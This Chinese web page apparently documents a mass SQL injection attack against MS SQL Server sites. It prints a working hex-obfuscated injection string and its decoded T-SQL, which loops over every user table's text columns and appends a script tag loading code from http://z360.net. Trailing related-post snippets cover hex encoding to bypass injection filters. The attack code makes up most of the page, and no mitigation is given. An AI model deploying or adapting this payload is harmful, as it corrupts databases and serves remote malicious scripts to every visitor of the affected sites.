通过post,get,cookies方式注入,注入内容如下:
DeCLaRE @S NvArCHaR(4000);SeT @S=CaSt(0x4400650063006C0061007200650020004000540020005600610072006300680061007200280032
003500350029002C004000430020005600610072006300680061007200280032003500350029002000440065
0063006C0061007200650020005400610062006C0065005F0043007500720073006F00720020004300750072
0073006F007200200046006F0072002000530065006C00650063007400200041002E004E0061006D0065002C
0042002E004E0061006D0065002000460072006F006D0020005300790073006F0062006A0065006300740073
00200041002C0053007900730063006F006C0075006D006E0073002000420020005700680065007200650020
0041002E00490064003D0042002E0049006400200041006E006400200041002E00580074007900700065003D
00270075002700200041006E0064002000280042002E00580074007900700065003D003900390020004F00720
0200042002E00580074007900700065003D003300350020004F007200200042002E0058007400790070006500
3D0032003300310020004F007200200042002E00580074007900700065003D00310036003700290020004F007
00065006E0020005400610062006C0065005F0043007500720073006F00720020004600650074006300680020
004E006500780074002000460072006F006D00200020005400610062006C0065005F0043007500720073006F0
07200200049006E0074006F002000400054002C004000430020005700680069006C0065002800400040004600
65007400630068005F005300740061007400750073003D0030002900200042006500670069006E002000450078
00650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200053006500
740020005B0027002B00400043002B0027005D003D0052007400720069006D00280043006F006E00760065007
2007400280056006100720063006800610072002800380030003000300029002C005B0027002B00400043002B0
027005D00290029002B00270027003C0073006300720069007000740020007300720063003D006800740074007
0003A002F002F007A003300360030002E006E00650074003E003C002F007300630072006900700074003E00270
02700270029004600650074006300680020004E006500780074002000460072006F006D00200020005400610062
006C0065005F0043007500720073006F007200200049006E0074006F002000400054002C004000430020004500
6E006400200043006C006F007300650020005400610062006C0065005F0043007500720073006F007200200044
00650061006C006C006F00630061007400650020005400610062006C0065005F0043007500720073006F007200 aS NvArChAR(4000));ExEc(@S);--;
在查询分析器里转换的sql语句如下:
Declare @T Varchar(255),@C Varchar(255)
Declare Table_Cursor Cursor For Select A.Name,B.Name From Sysobjects A,Syscolumns B Where A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167)
Open Table_Cursor
Fetch Next From Table_Cursor Into @T,@C
While(@@Fetch_Status=0)
Begin
Exec('update ['+@T+'] Set ['+@C+']=Rtrim(Convert(Varchar(8000),['+@C+']))+''<script src=http://z360.net></script>''')Fetch Next From Table_Cursor Into @T,@C
End
Close Table_Cursor
Deallocate Table_Cursor
分享到:
相关推荐
16进制转换在SQL注入中扮演着重要角色,因为某些特殊字符在转成16进制后可以绕过过滤机制,使得攻击更加隐蔽。 16进制转换工具是为了帮助安全研究人员或开发人员理解和测试SQL注入漏洞而设计的。这类工具能够将字符...
这个名为"16进制转换工具 SQL注入学习小工具 学习"的压缩包显然是为那些想要深入理解SQL注入攻击和提升16进制转换能力的学习者准备的。下面我们将详细探讨这两个关键知识点。 首先,16进制(Hexadecimal)是一种逢...
本工具"SQL注入学习帮助小工具 16进制转换工具"正是针对这一主题设计的,旨在帮助学习者理解和防范这种攻击。 在进行SQL注入攻击时,16进制编码常被用来绕过过滤机制。因为许多过滤系统可能不会检测到16进制形式的...
在这个主题中,我们将深入探讨SQL注入及其与16进制转换工具的关系。 在描述中提到的“SQL注入_16进制转换工具”是用于学习如何识别和利用SQL注入漏洞的工具。这种工具通常用于演示目的,帮助安全研究人员理解攻击者...
可对SQL注入时,进行代码变异注入。这个小工具可对SQL语句进行URL以及16进制的转换。 比如:select * from admin 将成为:0x530065006C0065006300740020002A002000460072006F006D002000610064006D0069006E00 用法: ...
之所以写这个,是因为发现SQL注入和XSS中经常利用十六进制表示的字符串,比如 SELECT CONCAT(0x68656c6c6f); 得到的是hello <!DOCTYPE html> <html> <head> <title>Hex-Char Bi-Converter&...
【ASP下终结SQL注入攻击】 随着互联网技术的发展,ASP(Active Server Pages)和SQL(Structured Query Language)成为了构建动态网站的常用技术。然而,随之而来的是SQL注入攻击的威胁,这种攻击方式通过输入恶意...
尝试使用空格或16进制编码的制表符(如`09`)会导致HTTP 400错误。 2. 由于使用`explode('/', $s)`,所以输入不能包含斜线(`/`),这排除了使用斜线代替空格的方法。 3. `$last = str_replace('&', '=', array_pop...
要防止SQL注入主要是要在查询字符串(QueryString),表单数据(PostData)以及Cookie甚至HTTP报头(Header)中防止掉一些特殊字符(单引号,分号)以及SQL语言的关键字,以及防止他们使用16进制编码。
根据给定的文件信息,我们可以总结出以下关于VB(Visual Basic)中16进制编码解码的相关知识点: ### 1. 概述 在计算机编程领域,编码和解码是处理文本数据的重要手段之一。十六进制编码常用于表示二进制数据,...
【Web应用安全:SQL注入攻击篡改数据】 SQL注入攻击是一种常见的网络安全威胁,攻击者通过在Web应用程序的输入字段中插入恶意SQL代码,以获取未经授权的数据访问或控制系统。本实验旨在让学生了解并实践SQL注入的...
例如,通过将SQL代码转换为16进制或2进制形式,攻击者可能会绕过基于文本的过滤规则。 后台数据过滤则是在数据到达数据库之后采取的安全措施。这种方法通常更加可靠,因为它可以在数据实际执行前进行检查。通过后台...
此外,对输入数据进行验证和过滤,防止SQL注入等攻击也很重要。 综上所述,"java socket通信"不仅涉及基础的网络编程,还涵盖了数据处理、数据库操作、并发处理等多个方面,是Java开发中的一个重要实践领域。通过...
攻击者尝试找出存储用户信息的表名,通过`table_name`字段进行筛选,并利用`hex()`和`unhex()`函数进行16进制编码和解码,以应对可能的字符限制。 【步骤5:限定表名】当找到可能的表名如`CHARACTER_SETS`时,通过`...
### Web应用安全:深入解析SQL注入绕过方法 #### 概述 随着互联网技术的不断发展,Web应用程序成为了人们日常生活中不可或缺的一部分。然而,这也让Web应用程序成为黑客攻击的主要目标之一。其中,SQL注入是最常见...
为了隐藏路径,还可以使用16进制的方式来表示路径。例如,使用SELECT load_file('c:/boot.ini')或者SELECT load_file(0x633a2f626f6f742e696e69)来读取c:\boot.ini文件的内容。此外,还可以通过UNC路径(Universal ...
例如,如果攻击者构造一个16进制的字符串"0x31206f722031",它在转换为十进制后仍然是"1 or 1",这在SQL查询中将导致不受控制的条件满足,从而可能引发二次注入。 三、解决方案 1. **参数化查询/预编译语句**:...
4. 将得到的哈希值转化为16进制字符串,便于存储和比较。 接下来,我们讨论SQL存储过程。存储过程是在数据库服务器上预编译的SQL语句集合,可以在应用程序中多次调用,提高性能并降低网络通信量。在登录程序中,...
使用mysql_real_escape_string函数可以对单引号进行转义,需要将字段名转换为16进制进行绕过。 知识点:mysql_real_escape_string函数、数据表字段猜测。 八、结语 本文档讲解了SQL盲注的技术,包括猜测数据库名...
- **安全审计**:检查代码中是否存在安全漏洞,如SQL注入或跨站脚本攻击。 - **教学与研究**:学习Java虚拟机的工作机制,了解字节码如何影响程序执行。 总结来说,jclsslib和Binary Viewer是Java开发者不可或缺的...